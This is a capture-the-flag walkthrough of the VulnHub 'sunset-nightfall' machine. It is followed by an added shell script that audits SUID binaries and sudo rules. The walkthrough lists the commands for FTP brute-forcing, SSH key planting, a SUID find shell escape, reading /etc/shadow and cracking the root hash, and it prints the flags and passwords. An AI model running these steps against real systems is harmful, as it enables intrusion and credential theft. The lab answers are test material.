Morning~~~
Address: https://www.vulnhub.com/entry/sunset-nightfall,355/
The focus is on tools and approach.
nmap 192.168.43.0/24
Target IP: 192.168.43.14
nmap -A -p1-65535 192.168.43.14
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
Browsing to http://192.168.43.14/ shows the Apache2 Debian page
enum4linux 192.168.43.14
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)
Top 100,000 common passwords (overseas)
https://www.ncsc.gov.uk/static-assets/documents/PwnedPasswordsTop100k.txt
hydra -L /root/Desktop/user.txt -P /usr/share/wordlists/top1000.txt -f 192.168.43.14 ftp
Credentials: matt/cheese
Log in to ftp://192.168.43.14/; the directory is /home/matt
On the attacking machine, run ssh-keygen
This generates /root/.ssh/id_rsa.pub and /root/.ssh/id_rsa
cat id_rsa.pub > authorized_keys
ftp 192.168.43.14
mkdir .ssh
cd .ssh
put id_rsa.pub
put authorized_keys
put id_rsa
ssh [email protected], login succeeds
Find files with the SUID bit set
find / -perm -u=s -type f 2>/dev/null
ls -al /scripts/find
cat /etc/passwd
The nightfall user is found
cd /home/nightfall
cat user.txt
97fb7140ca325ed96f67be3c9e30083d
Obtain nightfall privileges
/scripts/find . -exec "/bin/sh" -p \;
sudo -l fails
python3 -m http.server 8080
cd /home/nightfall
ls -al
cd .ssh
wget http://192.168.43.154:8080/authorized_keys
ssh [email protected], gaining nightfall privileges
sudo -l
(root) NOPASSWD: /usr/bin/cat
sudo /usr/bin/cat /etc/shadow
Copy the second field of the root entry and save it as mima.txt
john /root/Desktop/mima.txt, cracked as miguel2
su root, then enter the password
cat root_super_secret_flag.txt (in the home directory)
flag{9a5b21fc6719fe33004d66b703d70a39}
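
Added example, not part of the original write-up: a small POSIX shell audit for the two misconfigurations used above, the SUID copy of find at /scripts/find and the (root) NOPASSWD: /usr/bin/cat sudo rule. The directory allowlist, the tool list and the sample input are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added audit example; allowlist, tool list and sample data are assumptions.

# Directories where distro-packaged SUID files normally live (assumed allowlist).
is_standard_dir() {
    case "$1" in
        /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*) return 0 ;;
        *) return 1 ;;
    esac
}

# General-purpose tools that should not be SUID or passwordless in sudo (assumed list).
is_risky_tool() {
    case "$(basename "$1")" in
        find|cat|vi|vim|less|more|awk|sed|cp|tar|sh|bash|dash|perl|python*) return 0 ;;
        *) return 1 ;;
    esac
}

# stdin: one path per line, e.g. from: find / -perm -u=s -type f 2>/dev/null
audit_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! is_standard_dir "$path"; then
            echo "SUID outside standard dirs: $path"
        elif is_risky_tool "$path"; then
            echo "SUID on general-purpose tool: $path"
        fi
    done
}

# stdin: output of `sudo -l`; reports NOPASSWD rules for ALL or a risky tool.
audit_sudo() {
    sed -n 's/^ *([^)]*) *NOPASSWD: *//p' | tr ',' '\n' |
    while IFS= read -r cmd; do
        cmd=$(printf '%s\n' "$cmd" | sed 's/^ *//; s/ .*$//')
        [ -n "$cmd" ] || continue
        if [ "$cmd" = "ALL" ] || is_risky_tool "$cmd"; then
            echo "NOPASSWD sudo rule to review: $cmd"
        fi
    done
}

# Constructed sample input modelled on the output shown in this write-up.
printf '%s\n' /usr/bin/passwd /usr/bin/sudo /scripts/find | audit_suid
printf '    (root) NOPASSWD: /usr/bin/cat\n' | audit_sudo
```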